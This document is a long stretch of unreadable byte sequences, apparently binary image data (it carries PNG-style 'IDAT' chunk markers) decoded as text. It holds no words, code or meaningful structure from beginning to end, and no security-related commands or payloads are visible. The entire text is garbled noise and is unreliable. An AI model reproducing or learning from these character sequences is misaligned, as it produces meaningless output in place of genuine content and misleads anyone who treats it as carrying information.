DlR"e"&oFUP۔HoSEz!=¢f3HLe_HTGq҉_[A808bHΤ.N*pz}P?MV B,/OQ%6 gg'Ul׾.u/\˓&6o|(2#A'ͥdU| $*eVDMO#|G|?#{rA qa :ޥ+{1owj/j8Ⴔ/Ғ0-r @j3&cʅJ܌68]nnME~Z=@mǺV-.ibT8#2-Yᕦ5NAr2)\/)ft-e vϾwN6W~^s=xvBsпuZb8;b> 3Rd@R#zR3;_7֭|![# 9=^P7 Qb0Dꦙѻ \=_*onaLg.%ǿ )c`Dtn03<XCJm;K?;C?cz4o tK0ɚ3hx fMm3|[<|NOذ@*1kz6�Xz<K&C,ߟ!2ѻ~"n'�!N;;gDw[5Rov{xJyD}Eߕ=H\q]<@|^|j6aLd:v0Ji:̢ಃS v?tR0t%D&A^hdL?UȄoz\i8rei9=tZ<C'][r:.ڧSvLä\Ιl@:MulBamzNOFoRh'|MKxQs�sJ908 \{ZIRb�ey9v\%kn˳@KBdx1v-bNB7CoS;˥ |f^}joH^3L*Sφ>vm;hW&,/&6J;CKZ:o,y_YW9S2dbh_ܐ(]*= V H?<�pYwwbMb6(\N'Ž#>0{A8�*ͭGm/nTEUP@{D)+!<JxQb?!^yJY`;Rqh| 2-W.Y^,^VW2®xyn%6oðHX_p 7J-\*cX^4S Q9^X^,,o/ιA 5e1;(^=M0 cӌ/ULqwc? 9v84:v}]G&HfKq#⣎ ϢzJmSs"62v ?Qܸp+YCg<yZy:vJf| I'>hO)#;jA\ۜEq7s:ӣ=hYm͠C e푱fHVv-%FA&m Mrv'\{tR,kA<ުV:, v'sb-tʗ4>R"}3Ժ.7G/fՏr,Ȝ Ts3@l1R܏�cwG}]P1y&6|.|mqTlLrD- c t![n,658e 8 GκѳD蜯2Y97<}rj9-.>\X4N?GV۠"ݍD~Njgf+-6lX"ba=t1j5h?K,+bŊ �"aۼvw7o^;3e޻v޽{ڝ0,߄Ad ")V-dصq-9Xkdr<ւi??VӣדY#=sY$UM!\zfMRA.'=7D-]7Bs<%U}ojح1iOXepgyWX|O怈Yt%˟mw߰qV1a}@A^UhmZLjwg'ltYƭ#}0BIĖȲi|chIl0!`c<Ďb �AlC|!2Z|^w*Fi˗wvehD;Ѥ;,Cڔ9&%;Zx Qix:K*vүrpps )Q6a|ӕؼ&2�B1#!$u QSD'3L'ؔT?dQ\[C!4k՜H³r+M|n6m7`M5X*vuϢ8a)3Qȥ9~+?C )M+YGF@|9|U %sy,_c'uېiw1j$*Rt>}fs.>V\{ i:mI7?}\d&}(V 8J*4zVwE?7XtkkÏ0d &W\MqJu$ԕCgxkJFR6&h[)u:3lIGvlBzFq9[5} �ޖQ0jm$Z,r,IERw m^'ao;ΝE129֪/|clzF//ϧ Mlsh2sd(),1PskU%"q3wn">Mbu,? 3`H@m]Is^0Hjplzyᴑ.m;܂M_e>o7B�L+aMf0gu'DNmcq̧̉Vnš<;8r) B*JUn4'O̊t 7?8 g";pGwSk}6*GdT=4Ų~ؖЍh>9O7>R*+0Ćݵ'/TG2ӗPwդaXZϽfL$�xDބ0�Ł}kTl.!UOm.u4?m isdKlfȠu;zu#߫^0vb-^MO摒dvpNqG~`MH6k\~S1(v|!I^ [J5b x1T5W0Std;KݖZ:<FkPze&.-_\mq+p0i2 vI.mx=ˮ=nog{:jm^�Kv||^EׯaDNe+6| xH M7Vʪ}zWO\I+kkZig zXhm,VBTnt[&6|mAFL:ͥ. Bh�Tk\>ILbxZ0&7smj%$/yll"'hgXv/}!}ܮΎ>R&st}ˊ~Q;J۝jFLtPRV |>#.A)fCh%iĘafEd]%B?Ħ)&mp%m6G;)p$.b,υBYQ*_t<VoҶ/\ѠMˤ.I"6*c=:=o?Xmes|~ͥroa-SȢs\>HQO줯D!Q=x*O^ �nJum&n:nm x1FbҤZK?Ft/7�ԤH]In+!<hokwՉ&u[ lp`kʘ RKrk1R@Mz/q[<KZjlߧfpC=p IDVNf"&w?uWͰ|eas\~?GJo|ԝO_5=3BQ|,s]Hi=ߚƀ*4s3p|> gT>2%p-vs:bӵ2xJ<bcn^Y/JN®3rᚵy7 r34u529 <mg-Kc@e8ƿqx}zPfY jsU!8i|i2mS`st*>E]Vb{tWn0IHh׆$A]YǮʖ@-SfHl+吧o!1#YԊ.Ei{(W010\Ijm:k?<ZX xmQn9tTK7& q =iy WHz'RuS0dcDcnIkҎ] HhtMc. 1we唝Ta M䏪8اȥg똴NvktFne@ld7 ̿#`۩;1 ,慎׮Bx!J oWX:fsUb Ma~w zB1`pZ%c"X$Ϟ#U6YjYr& 'R)zag_ &"E yv*6T["pJ) ,Ot;) 1ښ$ީFID(KY58|-h8g!10VVܧڕp~KV;%R=6ݏf?I=9q"6Mtc i7 ŜPthW*e=Ji1T2؀GϜZu8|xv2{~u@7@{0PصIbѝNJst̥: 7]?b-TUG.Y슥=ԣ/v '&̷4ZQU̻X}@?qo= c8SD8z[QŹ+=?fIŏ-o=GLrmO{ER7 p _X S!Z>M%w'w1 V*cmjEsOdnƊ`L~yh6'uuc_X[_;TVP@hC"6J}~`0˰ BDῂ"4+Z1zt#4o]`'B.-7[pQ[3s% "s<Z6rيc`,XM9RVOa+dV}1Gv?4G=^F6ӚJRHW#Y ]zp.r9 A)OWb~= ̉?1q.-8n(%guSA0x_fBMO!=M=Sת~7o"Ϧ)V8zӷw ֕oxW9,3JÇ4(jjҋۤ#2ڼS*rVsZƎ85GK{Nn|ܧd(ăsP{ˈI%R RW9ɇ=R2~Jd;_w$?EgrJ~Ű 5`eq~D@a6ât+-yaLYohD:Kʼә7+9TFiz8[~TOvMs<S> 5z&')S!ŧN92z 4ц=' ǩ %UFȠ`(,sJo(C'cA8AمGoyMR2GbkdWwn~m-1-赸J7tOJV1gNƣ'۔K,?I-~\Vn'Fܑ �zN=^?rB8պR&6BLJE eq؆z>(h-RD{Aogbۦ@Gksz 䤻x7= w`^X' q g;nqx"q߬8ޯc73@N,[J:7bgK(Y=HKsNJ衊}$Æ'{Ӌ_Jl;j|j$5/a:- ZT@ iNY&$*+?.3X<gQPcYl[Mb]Z<Ah_6G; �N$[&ŕR1Ɓ=ڒ|J8u\b=G3#uUx8YB6,y΁9'r:6-wMsاl++A6z6wzU~-dPϦxbĆ l-_Mbia鮿-kB,eY$&Tӡl'&Ev Kicb'@d<U= :z!=U K8y%xsk\4h\ \߂^s>Cv~L8.M' D7<wT=^-OJ#M Ʃ]jFw. PgPΐۃ7`a(9˟-.g\LETmxV;|.Y=-P;r)ʖ˸WlH[#-VlDv&^9"M~[ʵ%lsqaۅR}Om,0rZ V ^價ͼpʣ3`R⏒ɧ͈a�GĔ h6Ԏ{#)5gPHҧ25Ldxr6s=YS[qjJ;!RDN-c` p^qXYf>otF}]'Y3r,k*R,y,LpUNwsD$uE}IbT=Mm%<&oKl~2T7NVgz3DrJJ'q%ey-Ҳ9l7jq:yYߵI;.-&QM6WX=X΅\<]΍evi4ЬCx}mCtu\rTu{ ag7LآJTTXcR9'Cn9 <0y_G&OuZE{GCX.Î?ޡθS.AT26$L\WS6Hɜc}Xs,q32=O3Q^dy^ej9Z54 hb[Q- k> e2`h5Iɀ[.r[|(|�n+l4e<֝bs$ƮiW e<qԖ݉\ up4iv/Ѡ6<zjDNr$y=ZÂ1_Ff9Q w֠`_ұ^T^pNSGZe D~ۜj5_9fH-4[jaU˗v&0(ċ_!^SpBixB Dó~Z`5zxcY+_&VTJ3QVeO~0 h}"JW*tq: �SP09}!ep L uR#fr8&��@�IDAT7?F{AoTBfwe|Tܗ5@l )3OL|O~`] "5$-hWmFSLI\k|8ƈ!c �# qI1^Voۇ]Zىؠ]xBwh9T=�WTcQ"9I۾bQ[e ݟdyzsDNMꘖ6҄f[gpMfjIj�u=U0V<K*:g镝Hub76On9ǑT=u_p꽖7 lcS-'ho2-sCimRelO(Yb3"—$ 6Fl�23WP;%x<'[ `G =2Ii^x_L^LKbܶ?lny?i]Aj_2b_c'$q?W͝F +$W"`}}ǒoϧXs%Rg1,-"HO-C&{4ljHA9Z.[A[6FJwcO|Qa#O3ي_d�v#<.C;aeW\dLKVIH<4⸤Mp6&1 5 \(o^^ ux5yRzAEH^̇X( (nJn'An0ReV:d\%n˸isKibͷrRg<^@gۯp>k耼.vtbȼ$bYZa-;#nO$TnO3ɧ%45{[wNdO;Rjqx{۔&\;k<MZAį`Y} $Kd-|'6 vaNg\`5瀦g`ob!p4q"6eaKk2f'oNJ|支#>{zϤS9:/| l'k^GpW=1kRp}d$lLRwC:|nx6ӃwA5Ob`9p҂c"sM`obS_Ԕ3m{ǨmeĎ;$6V> 4ՋnyFN=op#Vn2| ³ JU=DQaeMexJ6\J;x oYse .͗t@s H1N0׃ߴy/1u=G]|�Q>PL:Sm$bq0$6_ =˲k"ш:n),ւh[iJS i tS7 sr(U@x՛1s&&Wj}']vS'~)K !']d6]-L;{n ))j&64uS" 4*ذP͓0@|˸u])qs?B0`E{2UoDqd;? fr{[6tc\6ÓawElʟ0|.c;J4&bG6a 93t=>z d[b[ MlD?c̍vOv.#6K8=3S'b䱐l灍-v5I*Bg+"qYoDZfي4aѷ|29QzWٕX f9=bTlewUm~¨0-b&PWRteh{3>'b 7cMyE;0Yr1bK>14~i[(gFtQMw혿ˮ'Uf$b|M"rգr>tk<$}_@6}LD:k>DsߙϘ dm"_&umR'XȰ '.#†&z;( ăZ�=UjKNgB'spڋ*}W?|g ${%\ga !p־U\AT+AV~Ԟvlx=%a4@JpL#k>5="_} 𐰨;c"6wvp*99DALxIF�ш%,S!-¦-'[鶂t/xWmw*Q˸ \ߞȄr)&t@ꢏ:a~_*N88\ƥhөzlT!3(̕p6$9:| NK|c.ͩqq@ᱞbil[$K봔\^ 0O׸-e!Y7)_SIN\N,Tq5*X(xau6 OaTn4/XrY }'+ٯHd6JA?{l-}'$cV<=/b+cATĆ$lp �\_ f5#n<Lypʸ|7f _Xac;5_㞙=T%de"N95XW砱3lpFSDBjwӿr#r2)+ Dl�Ny>ut7 *;TG*xneљMȖЛ\XWȳemu8Kݲ, RNlz&cKfȊQ,bh0dwYxY-kKW~v:88!4ݞS,UtHaP jޡ;vUdlFA`p9 /eby)yB͓i b;S@4]57G "y}5[k+Ŕk9 <F\&EU_Ge) U<@1)u2S/{J`m}\;2+0ZiNX{UXh |@U'aR‚XaMa ƊV}"O~SZio-u03}e ; Hk^[<ljSq3dH/3Y?JN̐AdlEs:0M<{6l*TK!96X^L"4/ VRmV1\*d+! ]%z3إg3cW*!kJNTy=_Nt'Z6 P]"m,xX "wS,,|CYTEmآ؋Óߌo7}QoԲ] FeƐ)C=?,xNuDprP4L'UƁaD614|yBO]|%3Ẳ4I1l0q ;G}R9΅$bo<T=,ʯ)S@ QexFeqi}_*#q|߭)k+v!!*;Zt< ;fY6cۢ ,WO$BDB|3#ZSG+#JwJ`Iltu4vP_Cx"%6Ezwp't qo>AFl~E2)ub;Ȍel xR`i%2XA|\-�SaEv#M}ԜPo~o)_Hjo9W0п,A"L1oO{d?31V|IbYY+=5Xbi<8øD.3 .aq䜑gxK⟲Kfۆ-0)Ume `K>ډJN6xLR4q,,@ ]1|lXOA�Ur/ԁã|J5zS/"9!3L9gp=Ę`o5E&s܃4CZ�b+Zzo֋(ReX־~K7=J7Sճh#hi>&Lt٩IV\p\!j"SS9NOg2wb|:)\>pCzG3E8};ݕج##6_XSMk} uwկgh/4]2b nAӰ{]y-AK[n'^J~4<}.оfif\_yY )>K.ygVwReQ6*^ջ4|m |EN2(YゼhYP[Tp+( k\>Vɲ?C<KbٷL~c3=HW޳՜J`C5" o|+ei(exL+mmZ-8A xNN\% `֕joI0|g02&qbi\BV_-X5X^lmi>Ҕ@l*exN6I?lS+ApT]e z]| q3Bb9 40r E_gHKm_2_lKda}XQzq[Kݧ.jub7-TuS.<h٥"p�6N6^+׎ZeY% kq|?NFCמTQ:@MmDk;ʕب^~aVv+l Hg7` 8׮ع14Ov'6>-Ovy(_Jj! vk$6XZM]5DP(dJfdRW9 6BHsʡo~382l/dPpSYK3ES 0*5sq5.IfkU�AHds?Gdi`V4_w%L$\+7251o9fѲ#\|8J.+69,81nLY3vC;vж$w^[ 'R{ s]-כH{H;[M3Kݠ jKL:!"N6Tq.ڲny$\b7`)%U'ZLDZ�aoaIKN72ƩKj *mzӓDp\<lcڤ,bT+|dS7Gb,:QU|l57+ɫ,k55u-hV^2+i[RKLn~ *`I1!%÷+;/cvuhTg.ăf.)mP1x2Io /, SRդXv oc{B{}*V8C h?ӋОi7/-{EE%&߭x:mb.v`_E2Ԗ'^|)bR4q6"K즲Blm Yjv&]B 5V;n}S8|k,NinftRRgS `TTͅ`vϔK)':;C $CM&N68ij%6X6kc\ ts ' FigPt28;jʵ'zꝡtER7J3& v6u,GpcǛXT)!|Bd=.#+? 3]7vp%6 t;e%6t#~mgXy|kEa-b.g͐u2YVYqps1d_W.վM w6HIg=] ࣷΐa;[Sdu5; PnڭeX݊bןgQ)ڴRsu'4@JA"6H30ib'0tFKTu1R*i?!u^/ugt!笢@L2_cSF`kQ^*%ZQSXN P#^Jv9PV9X;㾆s)O< v+Sf<\ _ϴ `,8n R|?ܟK`_[eg= <k|cJ#a&̔RpRP_p*l0DOX;6(Y|9|byRy9Px["|pT WIG_Q g}; ʕ<O{w%6�_|J>~ ݖpjr=޹!1L 4+8ɬ@P.Wە&ʛvi1JlwNt~O,0Hۮ|,i,pΔ{3<@ k'KCP_-^y JN{H2N=Uނ<q^Zvzu@s8$\[5+ \ukղEy1&'S�v$南I1Y21'cѭ umq^N5*ck3͋7{? $zrb׍o996Ey!fuLo[~eUd(܋߸FZ&9{ + h:aބFsNK{m7}X?ͅ|鉰Yy,||W"loLKq/~I8SsVN,| `%p*zMQFIkGjRb5C mح+'254<p#d{jy}eo:+:&i7*+ ݊ǬQLȵdle_{]Cz rQ7xoHϲlj𜎦ѕ=i f00 XPuQv4< o~lf<Hb}d}zY5ιL-?]l-w@Gb�o͑,mbñG]5%lFΖ|fbASgJD}Etוʬn;ȴ-9? 1S1J6+rǎ'X F|55ݻ-'vyMŵnK{[wM "GbR9y.9\^gM־06p;9zm3dP7y@jŰ 616LTH&r;T&u{Y%ngp ߩ,#8ԘO< {c+2߹{s*x6~@y!#ZD!�;o&la}58a�uDU]*o0kQ'>X>Yf挩hڟ[9L7}S&(bDUpS_h43[tNJIkkWO8>\4qډq;;Cec<$r$65z BcRs˗q$68[/6|N <X 9A(^/(TJTc ib2*,/L {fY2" @=r䡬[_uvw$;h]5v0A|e~Bz;Օ1ȭF-3SHۭL}MGQfE0>6>%. @Dr\̀^{ty*[5>wn!66< |;vf+O_jcǮ.l;&iqADrϱe>yaMB~R7Iwa~Ů|S+(ܟ:4zeKژ2!oC42x 6gtomhϊcD2X}J۝E4x59[8'!c6�;W6*3X.Xi =]#gUy?TşM&%UM鐿 1e9I;Z^YĒ *@ 1"6b>5m) 3*ep�gΪNWeG;:p01qqJf|]{jF^MpZs1b,0[6Zid+;bB&]l*z.caj 73APtzްm݌EJr޿/`eݣfm΁)Kh,6ii,K*R. ([gT?auG7hg Y[$ۖR5>[eheDuǚK*_4(Ȉ0Gc~.w4.U e+Tfi߬r߫^]h$ @?p0&tNia|c@ꋤkwwo@VriL%"[?hQyN|YߤD<beYfμ.UlԦe2Q e[Jlbvp cdLw;un3ٖ\,˕ؠvO:~`89 <t鄞Md9?CH!GwsTp`/渠φDh8B^ l3Y'{dzzIٻo(U{Wɴwskz%k<7] VfA 1ST$2RFl؀0G0'�X\t6``poWRw1 72Ć~Bd:dTpq;SarVRa�t̻`l6[)UKޜv%6}c Bl)f"I'HɴS(\e 6[tS[os[w T]CzERK/v1{" \\zAj9^R.%wMɲ?\+d'?v0WKosh kvÀjI6PS�YRKsma><<o!÷ �1-K㎌sJ[֎PZGxe6c '8L:cq Y9Bb+ӖJl0\q,2_m[:یaö sDa`+]DgT9tg~R-")d%(`֦8AV.o�^3ʺUM �/ֺ3gJ%b\ :xx)Ⓘ04FKTnUp$ ~$Tv/;T'Y {l̽~oUvs Z:zR~^\1af\F_5f&2\ ߏ48]56ir1�]qj.|lZ\/.S-5)ͮOGmz>Ss|_ chj]=LC6He5lG<n?|1Ϗpsd}5RȭŷC^bOxmRr^\rr5)U,*N-U(t睲=պ`밳o?{!9}񮔶TY[%|q;k3'ˏX~*Y[廱I/0C3oY*"<s{lVJWw(zeD<|Tքia@k3U.:8i|x#=epu6Hlv`=nެjk\f=Tush-Y3AoJQTڑy\ | X(l>F2Hs܃1ͮ(|JFKKfuD?BHO٭%G~blhYeUFK|7f˺oxdh~jJlsXoI e"DHl|Q Y+#i;B4 ^4>UΆg7gt,{3 8ݛ+ZFlCѓl5@Kޯӱ_ʆGSp}Ov[Y<n4$hZ&i,䆺nei AdcYmVˤ묁6F Isp0W,̕{t/OA-N59TK!d7avD2gJωl>ZX1~ *fqCZfA/d1reO䂐?"E s]p/d;s5;l˥M\7ݩ*=ѵ=g!�sRYsS&/3$x6Wٔq<�yyNP [s=Kaن%l4JP~07|l^QDYi^HtC'(N7ˤR9JD85z[|N9!1,s\~<Gõh WEΏ~k6R{n$0+!U6R'WQP8Э*ֲQ1ZR W]|$!;3֔H䵸'7 Z핾]5N(r1.jg<aNKj? Of03-ǟ^wfcx&J(?W$6 w(VPsNHabL seGd7RiJۘ"s|KeNt~'-՜v+Yȣ }lj]t&c ͓jOKl#zYVlSí0-0,Y„=#Dѻ;H¹z6ojn/2j{%g{6HK/pJJ'C~ƴU+(^<M'|!QRA)4<F*uNlQ(Qb^$]_[A�TY�sGh,ݖ]dN=7A sz*~ UFmmu  ^J?Uc;pP 3xJS[Py7R)=Z*?9%\_k!6kme7AS/kr=J@jDjéoj춮*r(&M jYiVUN"6@C5$'& Gr0&1qu(vLn |Rݼf6[bHqNn:[kgNj‹=(7Xms uzrXѳq9) dtyt&?t_+z1 xS)+:6mq\ɴĭt?©GK)KѝX#Rc<&-, f ]l7E{I;0'|hoBj.uזH;@ayƽ�/k=xAgsJlMwJc01�{ĕ~R~VT:Ջ .iRɼ|F!DpoH>=ݶBp3KJY5-;̟Bl`iwrJX)UDyzTu Ruwշ#B (#Q9cG ,U*Zw} Ksɚx4PWFФ0 _�+or QS:.^'ns*'/, !kE0fz7N׸ qЯ|K&:f̯V!'N5WÐG@l*й/zOT5Fj1N-x rAz酅%:(-+o|O_ 쪛?IQߓ?_;;!jjT& o ;2ce"$Г7aT}qW9_^pN NtCr~onކc´ŀ~=j16F{6]Fl '"9 qvkfQhD[LިBH~{F�F~裉_zp K%M=�)!#8�y^ńYÅk`OCx8AػJfp1ܸ^ꟙṤwa'; tTfԳ 6Wwm6A{mEqړI~ U䅁B%4oc4;sPިMlk*FK:;uG1jv>%K&-4%65PvxmCuy_,)|:DHF> 1 p=â!:o&YءʲڢPc2 BMD}'?T Tv؉@ĆZqa@.�F KTh iv naZV;<Q4Ƶ c3wf^26~]<]wM!չi6wr<O&ߎ' GwaRc<'lvpLKrȲVb K<HI"10ǰn* ehc1ͯH"X`/bS"JشJq;k@wqbCwL x 74(tL_ hґ*>j&Z5C<]߷sϾͲd=Mp_޵j R,2a1yJSmv>dqGe>]޳Meu|Ɵ3Љ݈0ޗ7ĀT| ]ECR2l Q<їOqE<#CbʨPi84Z�RV�įhco1@eoڴZJKskV.3YʹDK<J@$`s.ec+_tc(qꯟx}>I� x`~2ON|WZa 6go?viQkԿ94mˎї9_b @`@R s4ykrXcYcrIN$kf1*Zݼdszj\C4βƅ!B .㱕Vo#܉}JݺȔw߱<MW{�'?0@J'e|~/Vj+v1Ft_fMs\nҢ. kZ*ӥz"IGfղ7C <! )#Geasd )˧>t[S:(fqg#M�}%!QZ"%'9$.(LIcWGb @b@l0}Ȫ.KZ'RǦ`dDaU4 XIk;A'>˥FaSs9@B�^k&VY^ Xgr{5>|w@ !M.3dzuns ޣGb\ hc뿴2@|�ޢEZd#s4DNȷ~T{S&6dQ=e Dp.xFj[q 8֪*aQd9E}06@B€f.wY7ذկ~Wzx<02,nMɑUgQ!:P* El"GhaJ\!Ϲ[xXoH4H ,GYg3<7EuvSUD^Lb @``w.6I5L:VG El&-)6 ׯH`F.<+b NxKlCXC6X B 0#2bDXi;El҃hd}Si92,;-}@M-'`hT|AjB W u&<>zL(qi-^^MWjR7K]~H?&@C>M1p<T5eC :d)w10Kˮ9RX:4izKY.)_esd&mEAwAɦ܇prW S<TH(図 T#Rxf]ezp"Y)"5?7eV&BzCD'յ l8C` a`)#iG8aաLjH˶Pu!zasq#;2Y /WY:B6i=\ |eӵ/Qf8ob?X׫-3Wz*3n4?D=A0XbW<!tV ̐#K@{C&2Sb[5UY 'YŸz8iH91 <R"wm/_fK_P$j&fبmKD]ށ_XOzY�?OIO7S!gW DvtńO!B �nb1#ϴ z i*Y�4Erm,m8^8} MXצEl1bes"x]A6Dm$2Z=$:FϾ W5R�_\OTG4eBr !0!RyX7|b4Xa(9ǖqWLϒ+.Tp 5fT|X| w 8&W<E|'uBvfב)N۱B >a`ΆhL].OS?'ՋsFހՈ5-tVil z \F" ԛ tw#nF>ׂ=k#|<@.]:GF RS:_,u C ˈʥ7]| qy߻>uJx4նHm̦Pl�֯uhÎp /u} 44wK|-/t]ad5G8D'뭣Tv}HWUWУu|kVc@�&�>8\hb1^60~>Nfg,qKãQR.ezN6H ~ʢk5IV3]zӗ0?Hz~X*Qk�?9 hJٟ|MBm\X;!z>{x2*>.lA6+M0aX5KH lCFz }"R.q9'ӬZjag؀EbA- <73)ȉ^V8B)^zx8|TU*S. 23`̉aT!J,6}A`0aH~kmtWsI$( V d;G`[vVqnztv74]r9}ѢAPj 'eTQؓs8cT)Xw Z='-FtȠ])f{;E"8אP9Y!6Jk]-W@ptclwTA3Bl8vVתzS]NUJ~À^RR*lO;pieώ]loGdcT*v !8=˜ \{܁la<mfnT^TA(,RUɈ*Mו)8|ɠBCoZîHlF2i;Xf^[jS""46sR$kzwӆiZ"<W#`i 08JPʤ/v98Sq'2bb!V`.EnͤaeC6 3 C$?]sy` d.ۍ +%D N{7FO34xqϵ%wk&DK v_5J?+Xi 'HeHA2Jl)6-ϦxA~OS!ՏDvųq`Y^&o0Oĸv{n1��'IDAT6_j+l ;E.<"RyCV.?]*j8 "WOڗɂ-,5=Cϛl(Wf,#t'eb7r Y(bAf[ݭޒU_Ly6us6g46kȒ$_jߒNl:E_D_-r{:qTڵ9dEd9c\Q!=H+=GH ]8ɗ'uل\rX_#἞vgDkX퓸f2ic6;oJ6`@։VFZ/7gpU*[%FBpδN:~S5-8 mfXW/^Wa9>|M '{K/ry|,f'lRjb)}TeH.[,B !'Zu<;'H‰ZZ4P-xOgv:6X06G<mTfs5,FK$p)#%j],vf$˿5ףMjCsyfC7 tۢ_KCf5&1^(WnHYH޺ zt/vniU~پ͑8սT>=n +~;Y>0Œf}3�[~yG >D&CƠ݇QJ1n#6Gbr39}$ 271TOjcHi!?'SiUDŽ2U^Ç\6 Kُ3}װʮakmciqԿ` 1uLrdm1+3(5EVZㅲto'|GjA y"L&=obS o}?fI1c09Uv8HdObu4W[v4]m #2+6vt~-w&ޭv"ze-\L4"^/zg)o# r(dp*6Gc8հART/:Zu"{v?Q<JhfH威|'4YZ%L evb ~ ӑahW:CCũj[8qTlzׇϦƹ|T} |`@NU$eE,=$U/*YLv,ȫ7ѝэjN72Gz3vړ6 }iSo&gelԍZ~r1>P{Q\oH}$2'`\U/uOB0oP#8XaBμںr w[=jm0WcLB`� =Flpl<{F"Z8NR_%2nZ\J]wh fmbCYs09Byxs / _\x17!+*.˚q0dNZ]ף&iӎnsTvz%\v=?T�6W;AFU8KÃqRO_Q<R=Sd>JacUɩBֳv6w vq1Ərjny۞vFK]BhE$v[Hh#6DXG+ i Ƨ`y,Gkĝ* 7Ar2i:,4},gf5xTS%6]L.y _ NJ4 Wײp.gl56Kl"s=x0^:ۣ덵]鼫m!5GeTo!>Q>lP+eN7?Cf;w|J ,'Y)}:ݻɸ(CXItw.KQn{ݝ̍[Iuǐw(NmqGH ÿ! Ho۞f"% ZfxΖ"RtWTϗVUx><V_ m=_\|'z>:%-/.n\uJL+eb U8JK9@ڱc|c '18 qm\jT#{wnlS{SL=`CĤiY>`P!JI'̴SOW$vgzK2Snϔܟy6)GбC6)}m'4;̥&h?hs\f.=Zihs7ז!6J 6m5"`&l#6Kn[$l 9=v*9gR)UuZjJp 홏ueyidㆫtX[8Lmx>lT##âoW,Bڼؐ=F˂ߐ9V}ӹ$O2/m/3FQT.;L@/w'/5sr+jt+)QQ!"<^3S<ۍY_F~ Gw}v\#DEVpHt&h9"ͺq[ƪ\"зF vDP+ D̎bLR~_m1\a56#}Ѹy=͡a% } 7Ʌd\0'ۢjl^}>iSؓz{K[>BQd Lms͵T n=0]8\%j/gMm Qsr*\fQ~{2p4ٰO( YDOBv? $oi;p4Q<sm*7 [Xbd'k z{"U1b10}s? z.Tp"'{^8l1 ejW_+f ,R w\?uNPoRG�aaR�Z(5( p! z_6y/x*2ۿ@l Kear":wIVУ^@}^6#+g{A%Ƙtg/UqRSo p.#s|*Ϻsb$ǽ@HVd MA%4ٯCBIbRGJf|n<+^pt{[Ov7d xYF0VStONe9r+S[XKf1`P/dvK׆(Z_ Eg} ?^ml*>,/2F`~h^{땷۲qst#{[Z ps|^"OP*7RP97Z/P^a37^cyوAhs}ɍ4Q/> A ȫr 9Iq lN+fi>PwLnp~ӨsA2.o[* Ad뉺:co5oX_R9XfB[O)牍"B5|N_Knh,?l78җ[T3Vݯ&Җ"{0DQ)}}8>957bvY O79<Z{a,aKYP)S_ϺE B[O)/ A~F*Ȃv,&iM)d+Wm#OB<?np~Ӱ[$ŷǻՀo[#mgT'\0[57ב>o0ƙ ٸ]JGzFBbc]*݇vf8Y͙p.: )ZP"%CKjMm>c� 'S*xtL]:g>[ [`x,Ԡ=i2bRbI[)sS~}=Rcy C1fLd1i!e-I<xgps BN*Rx; F9Eq;YOv(z4L2IpF\02ߗӭ]JClc:ǒw[KЛ5Ki[  =Bl =ٟ"6(u߫y;xP&v.'Xg'�Ji'b>YJDʞ)N>k |~ GvSܿA%:{ c,f4 RQH0O @h_$u;5 2kZs{daQ.nx(T%Th}ߛnu?h-P%gKlʀ\) Bv.' mT 6.Dӫ AM4M0 4 +( J/G`xmh8buzJ|R_?Kb%ðe΀_Յǁ]? K ְ4.ll!ӺyV1((`NSnyE| 9kz.&;=ׂ]3'O[IfY1I*`ԚV =&$4u(z08W*;aTƖ؈RKT^<4qCzvGN5uV1c1Nm:XzK[BT1^>Xy_7D^DPkZPc9eLA%-->kPC5BpnBqS<8bIl$n }‹{rb&^G&ܛ(TnɲƂ ¥%͎k D4*gH~2xctktu91xMMTxy=R$:oFOL\ u$_ؕ!+PǔϤ�k9xcͧ Y2N[ ۖȪ՝NSƯu{&u xdD�gJ՞h/rzg[qroa`lT_{/r2!/@M#կ=?q]� ]fF (qݹF+Փn ԏAJ0-pդ2N3|#@zm65491l43H/7ǥ<{gK ^BAPZTDS-sGq_:—z9 Tuwfwx/H%55F)YV#Ec*ѢB!-K3S P 0w$,}8<̝ٽs~Qqf"WWy%Di�ӿJ8GDIE4 `@w(Ѥy`2Ϛ^f#pۖɝ&i8pbkNi-, ΚɶWLxA_BᆳR>;3dz0~bg=,ۢi aLx>u{&RT<B_;a3-3uB ER\X�*r.#5od˃6MM"ހlq w~KRs[_6 72+"cLN;VWۙ,/ [128 V!ڹGRW"nt׎lvyZήqO34\꟬ 3SW;fEai\zl-T)OA"БOB| oG2-F`"Cc嗶o-M_.3,B Nxl|atLn9l DZ.үBsٞ(۲~m9*,;,iĽ,RJ*BMX丛Zj'zd5)tt.",Cw\+eۜdY!$~lOsleB ]le#]Q&1>Q7 %0AsV3Ο[f[0tl놖pA6ت9l?/\o18-\~9%Cjpbp zwD Lݓ -엿BwKK ڪ*ϣ sK_u޷Of!;wgJN*>/|f*{LXnY@̞DŽht#tz0/&;w^ʦQVV9S\V-| 8R~WI}M�vjA#L�Й/U0B {B!t"-Z4/wl Tk~q;26x<fn3)#neX]X뱝׼ilT οJruucǵٞ)Qs$ џ9#SҿgshhݷYjdѣlLW^hu|1el9y[z>-8ǹ<:sXX@M~r=\{=L4fI )DēH7sP]w(ڈxS*3ԊE dc`iz#{!aԿ*]l'yɖ5˾FN ؼ2RxE]9q�?F-C$>s`kt΋<.sRfy.viܶz ^MGZgVWd eVq >{\bImK4߈Xl@,oVTM.ҼU5M[.U@l99K^V s_|V7nt~8Hlf4I;4lr۽ddf3HaԺTs͎#i6wĦLMGA˥wn_`/%5O{4x/"9,]gUMb_:Zj_s_Ęg;os4O Q5'^.�Pv7/Nr7Ie%R^d|m|;UMNk/`KBk0s}b'9l%6;/I' jspfv1-LRiU 47J4ҽ+I kXdwJ2O1Q2='e.iョ~d<x6|nx"`!eXQ R:!-thcnkYkS!ʅH.|^N`29owI%JaĔntBTr0P%wݐ*&!"]vW:)!Xu 2򂞐.3Չ]@5<HQ쑏u2gxh]nװ5b<#eQ'QV�B3JN  KsC�5K~PXupHg)J7FObDnKNPɂ0*,,g BYDH"K rO}h gZ֚Ʌ\8*Il#Ҡ!<_uRm̜ƥasO-3=~d9 B}%iIw?\-[^p4pj k W)x\Ju_!f4xl7FH/%|tmf"t 2+vhsD@&̶Z-&ɨTX`-ս\bc2z }vwcڕK]L\cp6Mp"J#%+:-9Yf˒^wA2vX5MS"rAq'K 3zE*Z3^9YH9څXFiZ!'.ۊƇCk+ AF}Qm{Ib]M7R]qib"֙~J6yQdVjluHpo#=LEþDtT$鶛m}=;ͨ]0c.k0}ks x%}ةWL9oJE׼~".es6h $:08"D.bj#dS~ryY~=Y\ 